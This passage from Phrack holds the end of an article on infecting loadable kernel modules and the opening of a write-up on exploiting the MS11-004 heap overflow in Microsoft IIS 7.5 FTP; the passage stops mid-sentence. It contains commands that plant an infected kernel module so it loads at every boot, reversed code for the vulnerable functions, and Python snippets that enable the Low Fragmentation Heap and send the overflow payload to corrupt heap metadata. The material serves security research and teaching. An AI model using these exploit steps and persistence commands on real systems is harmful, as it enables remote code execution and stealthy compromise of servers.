Now it is possible to change the _init symbol name to _evil.
|
|
|
|
# /usr/sfw/bin/gobjcopy --redefine-sym _init=_evil usba
|
|
# /usr/ccs/bin/elfdump -s usba|grep _evil
|
|
[348] 0x00000fd4 0x00000074 FUNC GLOB D 0 .text _evil
|
|
|
|
# ld -r evil.o usba -o new
|
|
|
|
Now we have only to rename the module to its original name:
|
|
|
|
# mv new usba
|
|
|
|
From now on, every time the system is booted, the infected usba kernel
|
|
module will be loaded instead of the original one.
|
|
|
|
|
|
---[ 6.2 - *BSD
|
|
|
|
|
|
---[ 6.2.1 - FreeBSD - NetBSD - OpenBSD
|
|
|
|
|
|
The conclusions made by truff are still valid in the newest versions of
|
|
these operating systems. On FreeBSD, kernel modules are shared objects, so
|
|
the proposed method doesn't work because the kernel modules can't be
|
|
partially linked. On NetBSD and OpenBSD what we have to do is simply to
|
|
change the entry point of the kernel module when it is loaded. So our
|
|
function will be invoked instead of the original one.
|
|
|
|
|
|
---[ 7 - Conclusions
|
|
|
|
|
|
In this paper a new module injection method was introduced to be used with
|
|
Linux kernel 2.6.x/3.0.x series. Several methods, from simple to more
|
|
sophisticated, were presented to inject external code into kernel modules.
|
|
|
|
It was also explained how the method (with some changes) can be
|
|
successfully applied to a wide range of operating systems. I hope you'll
|
|
have fun with it and that you enjoyed this paper!
|
|
|
|
Bye.
|
|
|
|
|
|
---[ 8 - References
|
|
|
|
|
|
[1] Infecting loadable kernel modules
|
|
http://www.phrack.com/issues.html?issue=61&id=10#article
|
|
|
|
[2] EXECUTABLE AND LINKABLE FORMAT (ELF)
|
|
http://www.muppetlabs.com/~breadbox/software/ELF.txt
|
|
|
|
[3] Init Call Mechanism in the Linux Kernel
|
|
http://linuxgazette.net/157/amurray.html
|
|
|
|
[4] Understanding the Linux Kernel, 3rd Edition
|
|
|
|
[5] Init Call Mechanism in the Linux Kernel
|
|
http://linuxgazette.net/157/amurray.html
|
|
|
|
[6] OpenBSD Loadable Kernel Modules
|
|
http://www.thc.org/root/docs/loadable_kernel_modules/openbsd-lkm.html
|
|
|
|
[7] Introduction to NetBSD loadable kernel modules
|
|
http://www.home.unix-ag.org/bmeurer/NetBSD/howto-lkm.html
|
|
|
|
[8] Solaris Loadable Kernel Modules
|
|
http://www.thc.org/papers/slkm-1.0.html
|
|
|
|
[9] Initrd, modules, and tools
|
|
http://www.dark.ca/2009/06/10/initrd-modules-and-tools/
|
|
|
|
|
|
---[ 9 - Codes
|
|
|
|
---[ 9.1 - Elfchger
|
|
|
|
---[ 9.2 - elfstrchange.patch
|
|
|
|
---[ EOF
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x0c of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-------------=[ The Art of Exploitation ]=-----------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-------------------=[ Exploiting MS11-004 ]=-----------------------=|
|
|
|=----------=[ Microsoft IIS 7.5 remote heap buffer overflow ]=----------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=------------------------=[ by redpantz ]=----------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
--[ Table of Contents
|
|
|
|
1 - Introduction
|
|
2 - The Setup
|
|
3 - The Vulnerability
|
|
4 - Exploitation Primitives
|
|
5 - Enabling the LFH
|
|
6 - FreeEntryOffset Overwrite
|
|
7 - The Impossible
|
|
8 - Conclusion
|
|
9 - References
|
|
10 - Exploit (thing.py)
|
|
|
|
|
|
--[ 1 - Introduction
|
|
|
|
Exploitation of security vulnerabilities has greatly increased in
|
|
difficulty since the days of the Slammer worm. There have been numerous
|
|
exploitation mitigations implemented since the early 2000's. Many of these
|
|
mitigations were focused on the Windows heap; such as Safe Unlinking and
|
|
Heap Chunk header cookies in Windows XP Service Pack 2 and Safe Linking,
|
|
expanded Encoded Chunk headers, Terminate on Corruption, and many others in
|
|
Windows Vista/7 [1].
|
|
|
|
The widely deployed implementation of anti-exploitation technologies has
|
|
made gaining code execution from vulnerabilities much more expensive
|
|
(notice that I say "expensive" and not "impossible"). By forcing the
|
|
attacker to acquire more knowledge and spend expansive amounts of research
|
|
time, the vendor has made exploiting these vulnerabilities increasingly
|
|
difficult.
|
|
|
|
This article will take you through the exploitation process (read: EIP) of
|
|
a heap overflow vulnerability in Microsoft IIS 7.5 (MS11-004) on a 32-bit,
|
|
single-core machine. While the target is a bit unrealistic for the
|
|
real-world, and exploit reliability may be a bit suspect, it does suffice
|
|
in showing that an "impossible to exploit" vulnerability can be leveraged
|
|
for code execution with proper knowledge and sufficient time.
|
|
|
|
Note: The structure of this article will reflect the steps, in order, taken
|
|
when developing the exploit. It differs from the linear nature of the
|
|
actual exploit because it is designed to show the thought process during
|
|
exploit development. Also, since this article was authored quite some time
|
|
after the initial exploitation process, some steps may have been left out
|
|
(i.e. forgotten); quite sorry about that.
|
|
|
|
|
|
--[ 2 - The Setup
|
|
|
|
A proof of concept was released by Matthew Bergin in December 2010 that
|
|
stated there existed an unauthenticated Denial of Service (DoS) against
|
|
IIS FTP 7.5, which was triggered on Windows 7 Ultimate [3]. The exploit
|
|
appeared to lack precision, so it was decided further investigation was
|
|
necessary.
|
|
|
|
After creating a test environment, the exploit was run with a debugger
|
|
attached to the FTP process. Examination of the error concluded it wasn't
|
|
a DoS and most likely could be used to achieve remote code execution:
|
|
|
|
BUGCHECK_STR:
|
|
APPLICATION_FAULT_ACTIONABLE_HEAP_CORRUPTION_\
|
|
heap_failure_freelists_corruption
|
|
|
|
PRIMARY_PROBLEM_CLASS:
|
|
ACTIONABLE_HEAP_CORRUPTION_heap_failure_freelists_corruption
|
|
|
|
DEFAULT_BUCKET_ID:
|
|
ACTIONABLE_HEAP_CORRUPTION_heap_failure_freelists_corruption
|
|
|
|
STACK_TEXT:
|
|
77f474cb ntdll!RtlpCoalesceFreeBlocks+0x3c9
|
|
77f12eed ntdll!RtlpFreeHeap+0x1f4
|
|
77f12dd8 ntdll!RtlFreeHeap+0x142
|
|
760074d9 KERNELBASE!LocalFree+0x27
|
|
72759c59 IISUTIL!BUFFER::FreeMemory+0x14
|
|
724ba6e3 ftpsvc!FTP_COMMAND::WriteResponseAndLog+0x8f
|
|
724beff8 ftpsvc!FTP_COMMAND::Process+0x243
|
|
724b6051 ftpsvc!FTP_SESSION::OnReadCommandCompletion+0x3e2
|
|
724b76c7 ftpsvc!FTP_CONTROL_CHANNEL::OnReadCommandCompletion+0x1e4
|
|
724b772a ftpsvc!FTP_CONTROL_CHANNEL::AsyncCompletionRoutine+0x17
|
|
7248f182 ftpsvc!FTP_ASYNC_CONTEXT::OverlappedCompletionRoutine+0x3c
|
|
724a56e6 ftpsvc!THREAD_POOL_DATA::ThreadPoolThread+0x89
|
|
724a58c1 ftpsvc!THREAD_POOL_DATA::ThreadPoolThread+0x24
|
|
724a4f8a ftpsvc!THREAD_MANAGER::ThreadManagerThread+0x42
|
|
76bf1194 kernel32!BaseThreadInitThunk+0xe
|
|
77f1b495 ntdll!__RtlUserThreadStart+0x70
|
|
77f1b468 ntdll!_RtlUserThreadStart+0x1b
|
|
|
|
While simple write-4 primitives have been extinct since the Windows XP SP2
|
|
days [1], there was a feeling that currently known, but previously unproven
|
|
techniques could be leveraged to gain code execution. Adding fuel to the
|
|
fire was a statement from Microsoft stating that the issue "is a Denial of
|
|
Service vulnerability and remote code execution is unlikely" [4].
|
|
|
|
With the wheels set in motion, it was time to figure out the vulnerability,
|
|
gather exploitation primitives, and subvert the flow of execution by any
|
|
means necessary...
|
|
|
|
|
|
--[ 3 - The Vulnerability
|
|
|
|
The first order of business was to figure out the root cause of the
|
|
vulnerability. Understanding the root cause of the vulnerability was
|
|
integral into forming a more refined and concise proof of concept that
|
|
would serve as a foundation for exploit development.
|
|
|
|
As stated in the TechNet article, the flaw stemmed from an issue when
|
|
processing Telnet IAC codes [5]. The IAC codes permit a Telnet client to
|
|
tell the Telnet server various commands within the session. The 0xFF
|
|
character denotes these commands. TechNet also describes a process that
|
|
requires the 0xFF characters to be 'escaped' when sending a response by
|
|
adding an additional 0xFF character.
|
|
|
|
Now that there is context around the vulnerability, the corresponding crash
|
|
dump can be further analyzed. Afterwards we can open the binary in
|
|
IDA Pro and attempt to locate the affected code. Unfortunately, after
|
|
statically cross-referencing the function calls from the stack trace, there
|
|
didn't seem to be any functions that performed actions on Telnet IAC codes.
|
|
While breakpoints could be set on any of the functions in the stack trace,
|
|
another path was taken.
|
|
|
|
Since the public symbols named most of the important functions within the
|
|
ftpsvc module, it was deemed more useful to search the function list than
|
|
set debugger breakpoints. A search was made for any function starting with
|
|
'TELNET', resulting in 'TELNET_STREAM_CONTEXT::OnReceivedData' and
|
|
'TELNET_STREAM_CONTEXT::OnSendData'. The returned results proved to be
|
|
viable after some quick dynamic analysis when sending requests and
|
|
receiving responses.
|
|
|
|
The OnReceivedData function was investigated first, since it was the first
|
|
breakpoint that was hit. Essentially the function attempts to locate Telnet
|
|
IAC codes (0xFF), escape them, parse the commands and normalize the
|
|
request. Unfortunately it doesn't account for seeing two consecutive IAC
|
|
codes.
|
|
|
|
The following is pseudo code for important portions of OnReceivedData:
|
|
|
|
TELNET_STREAM_CONTEXT::OnReceivedData(char *aBegin,
|
|
DATA_STREAM_BUFFER *aDSB, ...)
|
|
{
|
|
DATA_STREAM_BUFFER *dsb = aDSB;
|
|
int len = dsb->BufferLength;
|
|
char *begin = dsb->BufferBegin;
|
|
char *adjusted = dsb->BufferBegin;
|
|
char *end = dsb->BufferEnd;
|
|
char *curr = dsb->BufferBegin;
|
|
|
|
if(len >= 3)
|
|
{
|
|
//0xF2 == 242 == Data Mark
|
|
if(begin[0] == 0xFF && begin[1] == 0xFF && begin[2] == 0xF2)
|
|
curr = begin + 3;
|
|
}
|
|
|
|
bool seen_iac = false;
|
|
bool seen_subneg = false;
|
|
if(curr >= end)
|
|
return 0;
|
|
|
|
while(curr < end)
|
|
{
|
|
char curr_char = *curr;
|
|
|
|
//if we've seen an iac code
|
|
//look for a corresponding cmd
|
|
if(seen_iac)
|
|
{
|
|
seen_iac = false;
|
|
if(seen_subneg)
|
|
{
|
|
seen_subneg = false;
|
|
if(curr_char < 0xF0)
|
|
*adjusted++ = curr_char;
|
|
}
|
|
else
|
|
{
|
|
if(curr_char != 0xFA)
|
|
{
|
|
if(curr_char != 0xFF)
|
|
{
|
|
if(curr_char < 0xF0)
|
|
{
|
|
PuDbgPrint("Invalid command %c", curr_char)
|
|
|
|
if(curr_char)
|
|
*adjusted++ = curr_char;
|
|
}
|
|
}
|
|
else
|
|
{
|
|
if(curr_char)
|
|
*adjusted++ = curr_char;
|
|
}
|
|
}
|
|
else
|
|
{
|
|
seen_iac = true;
|
|
seen_subneg = true;
|
|
}
|
|
}
|
|
|
|
}
|
|
else
|
|
{
|
|
if(curr_char == 0xFF)
|
|
seen_iac = true;
|
|
else
|
|
if(curr_char)
|
|
*adjusted++ = curr_char;
|
|
}
|
|
|
|
curr++;
|
|
}
|
|
|
|
dsb->BufferLength = adjusted - begin;
|
|
return 0;
|
|
}
|
|
|
|
The documentation states Telnet IAC codes can be used by: "Either end of a
|
|
Telnet conversation can locally or remotely enable or disable an option".
|
|
The diagram below represents the 3-byte IAC command within the overall
|
|
Telnet connection stream:
|
|
|
|
0x0 0x2
|
|
--------------------------------
|
|
[IAC][Type of Operation][Option]
|
|
--------------------------------
|
|
|
|
Note: The spec should have been referenced before figuring out the
|
|
vulnerability, instead of reading the code and attempting to figure out
|
|
what could go wrong.
|
|
|
|
Although there is code to escape IAC characters, the function does not
|
|
expect to see two consecutive 0xFF characters in a row. Obviously this
|
|
could be a problem, but it didn't appear to contain any code that would
|
|
result in overflow. Thinking about the TechNet article recalled the line
|
|
'error in the response', so the next logical function to examine was
|
|
'OnSendData'.
|
|
|
|
Shortly into the function it can be seen that OnSendData is looking for
|
|
IAC (0xFF) codes:
|
|
|
|
.text:0E07F375 loc_E07F375:
|
|
.text:0E07F375 inc edx
|
|
.text:0E07F376 cmp byte ptr [edx], 0FFh
|
|
.text:0E07F379 jnz short loc_E07F37C
|
|
.text:0E07F37B inc edi
|
|
.text:0E07F37C
|
|
.text:0E07F37C loc_E07F37C:
|
|
.text:0E07F37C cmp edx, ebx
|
|
.text:0E07F37E jnz short loc_E07F375 ; count the number
|
|
; of "0xFF" characters
|
|
|
|
The following pseudo code represents the integral pieces of OnSendData:
|
|
|
|
TELNET_STREAM_CONTEXT::OnSendData(DATA_STREAM_BUFFER *dsb)
|
|
{
|
|
char *begin = dsb->BufferBegin;
|
|
char *start = dsb->BufferBegin;
|
|
char *end = dsb->BufferEnd;
|
|
int len = dsb->BufferLength;
|
|
int iac_count = 0;
|
|
|
|
if(begin + len == end)
|
|
return 0;
|
|
|
|
//do a total count of the IAC codes
|
|
do
|
|
{
|
|
start++;
|
|
if(*start == 0xFF)
|
|
iac_count++;
|
|
}
|
|
while(start < end);
|
|
|
|
if(!iac_count)
|
|
return 0;
|
|
|
|
for(char *c = begin; c != end; *begin++ = *c)
|
|
{
|
|
c++;
|
|
if(*c == 0xFF)
|
|
*begin++ = 0xFF;
|
|
}
|
|
|
|
return 0;
|
|
}
|
|
|
|
As you can see, if the function encounters a 0xFF that is NOT separated by
|
|
at least 2-bytes then there is a potential to escape the code more than
|
|
once, which will eventually lead to a heap corruption into adjacent memory
|
|
based on the size of the request and amount of IAC codes.
|
|
|
|
For example, if you were to send the string
|
|
"\xFF\xBB\xFF\xFF\xFF\xBB\xFF\xFF" to the server, OnReceivedData produces
|
|
the values:
|
|
|
|
1) Before OnReceivedData
|
|
|
|
a. DSB->BufferLength = 8
|
|
|
|
b. DSB->Buffer = "\xFF\xBB\xFF\xFF\xFF\xBB\xFF\xFF"
|
|
|
|
2) After OnReceivedData
|
|
|
|
a. DSB->BufferLength = 4
|
|
|
|
b. DSB->Buffer = "\xBB\xFF\xBB\xFF"
|
|
|
|
Although OnReceivedData attempted to escape the IAC codes, it didn't expect
|
|
to see multiple 0xFFs within a certain range; therefore writing the
|
|
illegitimate values at an unacceptable range for OnSendData. Using the same
|
|
string from above, OnSendData would write multiple 0xFF characters past the
|
|
end of the buffer due to de-synchronization in the reading and writing into
|
|
the same buffer.
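
The normalization logic can be sanity-checked with a few lines of Python.
This is only a model of the pseudo code as reversed above, not the
server's code, and the leading 0xFF/0xFF/0xF2 special case is left out:

def on_received_data(buf):
    # model of TELNET_STREAM_CONTEXT::OnReceivedData's IAC normalization
    out = ""
    seen_iac = seen_subneg = False
    for c in buf:
        b = ord(c)
        if seen_iac:
            seen_iac = False
            if seen_subneg:
                seen_subneg = False
                if b < 0xF0:
                    out += c
            elif b == 0xFA:              # sub-negotiation start
                seen_iac = seen_subneg = True
            elif b == 0xFF:              # escaped IAC, one 0xFF survives
                out += c
            elif b < 0xF0 and b:         # "invalid command", copied out
                out += c
        elif b == 0xFF:
            seen_iac = True
        elif b:
            out += c
    return out

print on_received_data("\xff\xbb\xff\xff\xff\xbb\xff\xff").encode("hex")

Running it prints 'bbffbbff', matching the values shown above; note that
the surviving 0xFF bytes are now only one byte apart, which is exactly the
spacing that OnSendData mishandles.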
|
|
|
|
Now that it is known that a certain amount of 0xFF characters can be
|
|
written past the end of the buffer, it is time to think about an
|
|
exploitation strategy and gather primitives...
|
|
|
|
|
|
--[ 4 - Exploitation Primitives
|
|
|
|
Exploitation primitives can be thought of as the building blocks of exploit
|
|
development. They can be as simple as program functionality that produces a
|
|
desired result or as complicated as a 1-to-n byte overflow. The section
|
|
will cover many of the primitives used within the exploit.
|
|
|
|
In-depth knowledge of the underlying operating system usually proves to be
|
|
invaluable information when writing exploits. This holds true for the IIS
|
|
FTP exploit, as intricate knowledge of the Windows 7 Low Fragmentation Heap
|
|
served as the basis for exploitation.
|
|
|
|
It was decided that the FreeEntryOffset Overwrite Technique [2] would be
|
|
used due to the limited ability of the attacker to control the contents of
|
|
the overflow. The attack requires the exploiter to enable the low
|
|
fragmentation heap, position a chunk under the exploiter's control before a
|
|
free chunk (implied same size) within the same UserBlock, write at least 10
|
|
bytes past the end of its buffer, and finally make two subsequent requests
|
|
that are serviced from the same UserBlock. [Yes, it's just that easy ;)]
|
|
|
|
The following diagram shows how the FreeEntryOffset is utilized when making
|
|
allocations. The first allocation comes from a virgin UserBlock, setting
|
|
the FreeEntryOffset to the first two-byte value stored in the current free
|
|
chunk. Notice there is no validation when updating the FreeEntryOffset. For
|
|
MUCH more information on the LFH and exploitation techniques please see the
|
|
references section:
|
|
|
|
Allocation 1
|
|
FreeEntryOffset = 0x10
|
|
---------------------------------
|
|
|Header|0x10| Free |
|
|
---------------------------------
|
|
|Header|0x20| Free |
|
|
---------------------------------
|
|
|Header|0x30| Free |
|
|
---------------------------------
|
|
|
|
Allocation 2
|
|
FreeEntryOffset = 0x20
|
|
---------------------------------
|
|
|Header| Used |
|
|
---------------------------------
|
|
|Header|0x20| Free |
|
|
---------------------------------
|
|
|Header|0x30| Free |
|
|
---------------------------------
|
|
|
|
Allocation 3
|
|
FreeEntryOffset = 0x30
|
|
---------------------------------
|
|
|Header| Used |
|
|
---------------------------------
|
|
|Header| Used |
|
|
---------------------------------
|
|
|Header|0x30| Free |
|
|
---------------------------------
|
|
|
|
Now look at the allocation sequence if we have the ability to overwrite a
|
|
FreeEntryOffset with 0xFFFF:
|
|
|
|
Allocation 1
|
|
FreeEntryOffset = 0x10
|
|
---------------------------------
|
|
|Header|0x10| Free |
|
|
---------------------------------
|
|
|Header|0x20| Free |
|
|
---------------------------------
|
|
|Header|0x30| Free |
|
|
---------------------------------
|
|
|
|
Allocation 2
|
|
FreeEntryOffset = 0x20
|
|
---------------------------------
|
|
|Header|FFFFFFFFFFFFFFF |
|
|
---------------------------------
|
|
|Header|FFFF| Free |
|
|
---------------------------------
|
|
|Header|0x30| Free |
|
|
---------------------------------
|
|
|
|
Allocation 3
|
|
FreeEntryOffset = 0xFFFF
|
|
---------------------------------
|
|
|Header| Used |
|
|
---------------------------------
|
|
|Header| Used |
|
|
---------------------------------
|
|
|Header|0x30| Free |
|
|
---------------------------------
|
|
|
|
As you can see, if we can overwrite the FreeEntryOffset with a value of
|
|
0xFFFF then our next allocation will come from unknown heap memory at
|
|
&UserBlock + 8 + (8 * (FreeEntryOffset & 0x7FFF8)) [2]. This may or may
|
|
not point to committed memory for the process, but still provides a good
|
|
starting point for turning a semi-controlled overwrite to a
|
|
fully-controlled overwrite.
|
|
|
|
|
|
--[ 5 - Enabling the LFH
|
|
|
|
If you have read 'Understanding the Low Fragmentation Heap' [2] you'll know
|
|
that it has 'lazy' activation, which means, although it is the default
|
|
front-end allocator, it isn't enabled until a certain threshold is
|
|
exceeded. The most common trigger for enabling the LFH is 16 consecutive
|
|
allocations of the same size.
|
|
|
|
for i in range(0, 17):
    name = "lfh" + str(i)
    payload = gen_payload(0x40, "X")
    lfhpool.alloc(name, payload)
|
|
|
|
You would assume that after making the aforementioned requests
|
|
LFH->HeapBucket[0x40] would be enabled and all further requests for size
|
|
0x40 would be serviced via the LFH; unfortunately this was not the case.
|
|
|
|
This lead to some memory profiling using Immunity Debugger's '!hippie'
|
|
command. After creating and sending many commands and logging heap
|
|
allocations, a pattern of 0x100 byte allocations emerged. This was quite
|
|
peculiar because requests of 0x40 bytes were being sent. Tracing the
|
|
allocations for 0x100 found that the main consumer of the 0x100 byte
|
|
allocations was FTP_SESSION::WriteResponseHelper; our binary audit can
|
|
finally start!
|
|
|
|
Note: If some thought had been put in before brute forcing sizes, it
would have been noted that this is a C++ application, which means that
|
|
request data was most likely kept in some buffer or string class; instead
|
|
of being allocated to a specific request size.
|
|
|
|
Lo and behold, looking at the WriteResponseHelper function validated our
|
|
speculation. The function used a buffer class that would allocate 0x100
|
|
bytes and extend itself when necessary:
|
|
|
|
.text:0E074E7A mov eax, [ebp+arg_C] ; dword ptr [eax] == request string
|
|
.text:0E074E7D push edi
|
|
.text:0E074E7E mov edi, [ebp+arg_8]
|
|
.text:0E074E81 mov [ebp+vFtpRequest], eax
|
|
.text:0E074E87 mov esi, 100h
|
|
.text:0E074E8C push esi ; init_size == 0x100
|
|
.text:0E074E8D lea eax, [ebp+var_204]
|
|
.text:0E074E93 mov [ebp+var_27C], ecx
|
|
.text:0E074E99 push eax
|
|
.text:0E074E9A lea ecx, [ebp+var_234]
|
|
.text:0E074EA0 call ds:STRA::STRA(char *,ulong)
|
|
|
|
Next, there is a loop to determine if the normalized request string can fit
|
|
in the STRA object:
|
|
|
|
.text:0E074F59 call ds:STRA::QuerySize(void)
|
|
.text:0E074F5F add eax, eax
|
|
.text:0E074F61 push eax
|
|
.text:0E074F62 lea ecx, [ebp+vSTRA1]
|
|
.text:0E074F68 call ds:STRA::Resize(ulong)
|
|
|
|
Finally, the STRA object will append the user request data to the server
|
|
response code (for example: "500 "):
|
|
|
|
.text:0E0750B4 push [ebp+vFtpRequest]
|
|
.text:0E0750BA call ds:STRA::Append(char const *) ; this is where the
|
|
; resize happens
|
|
.text:0E0750C0 mov esi, eax
|
|
.text:0E0750C2 cmp esi, ebx
|
|
.text:0E0750C4 jl loc_E07515F ; if(!STRA::Apend(vFtpRequest))
|
|
; { destory_objects(); }
|
|
.text:0E0750CA push offset SubStr ; "\r\n"
|
|
.text:0E0750CF lea ecx, [ebp+var_234]
|
|
.text:0E0750D5 call ds:STRA::Append(char const *)
|
|
|
|
Looking into the STRA:Append(char const*) function, a constant value is
|
|
added when there is not enough space to append to the current STRA object:
|
|
|
|
.text:6C9DAAE7 cmp ebx, edx
|
|
.text:6C9DAAE9 ja short loc_6C9DAB3D ; if enough room, copy
|
|
; and update size
|
|
.text:6C9DAAEB jb short loc_6C9DAAF2 ; otherwise add 0x80
|
|
; and resize the BUFFER
|
|
.text:6C9DAAED cmp [edi+24h], esi
|
|
.text:6C9DAAF0 jnb short loc_6C9DAB3D
|
|
.text:6C9DAAF2
|
|
.text:6C9DAAF2 loc_6C9DAAF2:
|
|
.text:6C9DAAF2 xor esi, esi
|
|
.text:6C9DAAF4 cmp [ebp+arg_C], esi
|
|
.text:6C9DAAF7 jz short loc_6C9DAB00
|
|
.text:6C9DAAF9 add eax, 80h ; eax = buffer.size
|
|
|
|
Finally the buffer is resized if necessary and the old data is copied over:
|
|
|
|
.text:6C9DAB1B push eax ; uBytes
|
|
.text:6C9DAB1C mov ecx, edi
|
|
.text:6C9DAB1E call ?Resize@BUFFER@@QAEHI@Z ; BUFFER::Resize(uint)
|
|
.text:6C9DAB23 test eax, eax
|
|
.text:6C9DAB25 jnz short loc_6C9DAB3D
|
|
.text:6C9DAB27 call ds:__imp_GetLastError
|
|
.text:6C9DAB2D cmp eax, esi
|
|
.text:6C9DAB2F jle short loc_6C9DAB64
|
|
.text:6C9DAB31 and eax, 0FFFFh
|
|
.text:6C9DAB36 or eax, 80070000h
|
|
.text:6C9DAB3B jmp short loc_6C9DAB64
|
|
.text:6C9DAB3D
|
|
.text:6C9DAB3D loc_6C9DAB3D:
|
|
.text:6C9DAB3D
|
|
.text:6C9DAB3D mov ebx, [ebp+Size]
|
|
.text:6C9DAB40 mov eax, [edi+20h]
|
|
.text:6C9DAB43 mov esi, [ebp+arg_8]
|
|
.text:6C9DAB46 push ebx ; Size
|
|
.text:6C9DAB47 push [ebp+Src] ; Src
|
|
.text:6C9DAB4A add eax, esi
|
|
.text:6C9DAB4C push eax ; Dst
|
|
.text:6C9DAB4D call memcpy
|
|
|
|
Now that it is known buffers will be sized in multiples of 0x80 (i.e.
|
|
0x100, 0x180, 0x200, etc), the LFH can be activated accordingly (by size).
|
|
The size of 0x180 was chosen because 0x100 is used for most, if not all,
|
|
initial responses, but _any_ valid size could be used.
|
|
|
|
for i in range(0, LFHENABLESIZE):
    name = "lfh" + str(i)
    payload = gen_payload(0x180, "X")
    lfhpool.alloc(name, payload)
|
|
|
|
|
|
--[ 6 - FreeEntryOffset Overwrite
|
|
|
|
It has already been verified that the vulnerability results in an overflow
|
|
of 0xFF characters into an adjacent heap chunk. Therefore the ability to
|
|
enable the LFH for a certain size results in the trivial overwriting of an
|
|
adjacent FreeEntryOffset.
|
|
|
|
For this exploitation technique to work, the LFH must be enabled while
|
|
ensuring that the UserBlock maintains a few free chunks to service requests
|
|
necessary for exploitation.
|
|
|
|
Fortunately, this was quite easy to guarantee while on a single core
|
|
machine:
|
|
|
|
for i in range(0, LFHENABLESIZE):
    name = "lfh" + str(i)
    payload = gen_payload(0x180, "X")
    lfhpool.alloc(name, payload)
|
|
|
|
print "[*] Sending overflow payload"
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
s.connect((HOST, PORT))
|
|
data = s.recv(1024)
|
|
|
|
buf = "\xff\xbb\xff\xff" * 112 + "\r\n" #ends up allocation 0x180
|
|
#(0x188 after chunk header)
|
|
|
|
print "[*] Sending %d 0xFFs in the whole payload" % countff(buf)
|
|
print "[*] Sending Payload...(%d bytes)" % len(buf)
|
|
analyze(buf)
|
|
s.send(buf)
|
|
s.close()
|
|
|
|
These small portions of code are enough to enable the LFH and overwrite a
|
|
free adjacent chunk after the overflow-able piece of memory. Now when
|
|
subsequent allocations are made for 0x180 bytes, a bad free entry offset
|
|
will be used, providing the application with unexpected memory for
|
|
appending the response.
|
|
|
|
The above describes the following:
|
|
|
|
FreeEntryOffset = 0x1
|
|
0 1 2 3
|
|
[UsedChunk][FreeChunk][OverflowedChunk][FreeChunk]
|
|
.
|
|
.
|
|
.
|
|
[UnknownMemory @ UserBlock + (0xFFFF * 8)]
|
|
|
|
Three subsequent allocations will accomplish the following:
|
|
|
|
1) Allocate FreeChunk at FreeEntryOffset 0x1
|
|
|
|
2) Allocate OverflowedChunk (which is also free) updating
|
|
the FreeEntryOffset to 0xFFFF
|
|
|
|
3) Allocate memory at UserBlock + 0xFFFF (instead of offset 0x3)
|
|
|
|
This means the bad FreeEntryOffset will result in data being completely
|
|
controlled by the attacker.
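
A rough sketch of those three follow-up requests, reusing the same
hypothetical lfhpool/gen_payload helpers that appear in the earlier
snippets (the exact sizes and counts live in the attached thing.py):

# three more 0x180-byte responses walk the corrupted UserBlock:
#   1st -> the remaining legitimate free chunk
#   2nd -> the chunk whose FreeEntryOffset now reads 0xFFFF
#   3rd -> "unknown" memory at UserBlock + (0xFFFF * 8), completely
#          filled with attacker-chosen bytes
for i in range(0, 3):
    name = "post" + str(i)
    lfhpool.alloc(name, gen_payload(0x180, "C"))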
|
|
|
|
Note: Although quite easily achieved on a single-core machine, heap
|
|
determinism can be much harder on a multi-core platform, since each core
will effectively have its own UserBlocks, making chunk placement dependent
on which thread services a request. While a multi-core machine doesn't make
this vulnerability completely un-exploitable, it does increase the
difficulty and decrease the reliability.
|
|
|
|
Overwriting the FreeEntryOffset with 0xFFFF has turned a limited heap
|
|
overflow into a write-n, fully controlled overflow; since the heap chunk
|
|
allocated will be 100% populated with user-controlled data. There is only
|
|
one HUGE problem. What should be overwritten? This ended up being the most
|
|
challenging and least reliable portion of the exploit and could still be
|
|
further refined.
|
|
|
|
|
|
--[ 7 - The Impossible
|
|
|
|
In all honesty, the previous few steps were basic vulnerability analysis,
|
|
rudimentary Python and requisite knowledge of Windows 7 heap internals. The
|
|
most difficult and time-consuming portion is explained below.
|
|
|
|
The techniques described below had varying degrees of reliability and might
|
|
not even be the best choice for exploitation. The most valuable knowledge
|
|
to take away will be the process of finding an object to overwrite and
|
|
seeding those objects remotely within the heap.
|
|
|
|
As stated previously, figuring out WHAT to overwrite is quite a problem.
|
|
Not only does a sufficient object, function, or variable, need to be
|
|
unearthed but that item needs to reside in memory where the 'bad'
|
|
allocation points to.
|
|
|
|
A starting point for locating what to overwrite began with the functions'
|
|
list. The function list was chosen because public symbols were available,
|
|
providing descriptive names for the most important functions. Also, since
|
|
the application was written in C++ it was assumed that there would be
|
|
virtual functions that stored function pointers somewhere in memory.
|
|
|
|
The first item that looked promising was the FTP_COMMAND class. The
|
|
class will most certainly be instantiated when receiving new commands and
|
|
also contains a vtable.
|
|
|
|
.text:0E073B7D public: __thiscall FTP_COMMAND::FTP_COMMAND(void) proc near
|
|
.text:0E073B7D mov edi, edi
|
|
.text:0E073B7F push ebx
|
|
.text:0E073B80 push esi
|
|
.text:0E073B81 mov esi, ecx
|
|
.text:0E073B83 push edi
|
|
.text:0E073B84 lea ecx, [esi+0Ch]
|
|
.text:0E073B87 mov dword ptr [esi], offset const FTP_COMMAND::`vftable'
|
|
|
|
It also contained a function pointer that had the same name as one in our
|
|
stack trace, albeit in a different class.
|
|
|
|
.text:0E073C8D mov dword ptr [ebx+8],
|
|
offset FTP_COMMAND::AsyncCompletionRoutine(FTP_ASYNC_CONTEXT *)
|
|
|
|
Note: If the stack trace would have been examined more thoroughly, it would
|
|
have been obvious that this wasn't the correct choice, as you will see
|
|
below.
|
|
|
|
At first glance this seemed to be the perfect fit. A breakpoint was set in
|
|
ntdll!RtlpLowFragHeapAllocFromContext() after the initial overflow had
|
|
occurred and appeared to be populated with FTP_COMMAND objects!
|
|
Unfortunately, there didn't seem to be a remote command that could trigger
|
|
a virtual function call within the FTP_COMMAND object at the time of an
|
|
attacker's choosing.
|
|
|
|
Note: Although summed up in one paragraph, this actually took quite some
|
|
time to figure out, as the ability to overwrite a function pointer severely
|
|
clouded judgment.
|
|
|
|
Failure led to flailing around in an attempt to populate heap memory with
|
|
objects that were remotely user-controlled without authentication.
|
|
Eventually, the thought of each FTP_COMMAND having a specific session came
|
|
to mind. The FTP_SESSION class was more closely examined (which was also in
|
|
the stack trace; although this stack trace would eventually change with
|
|
different heap layouts).
|
|
|
|
The real question was 'Can this function be reliably triggered at given
|
|
time X with user input Y?' Some testing took place and indeed, this server
|
|
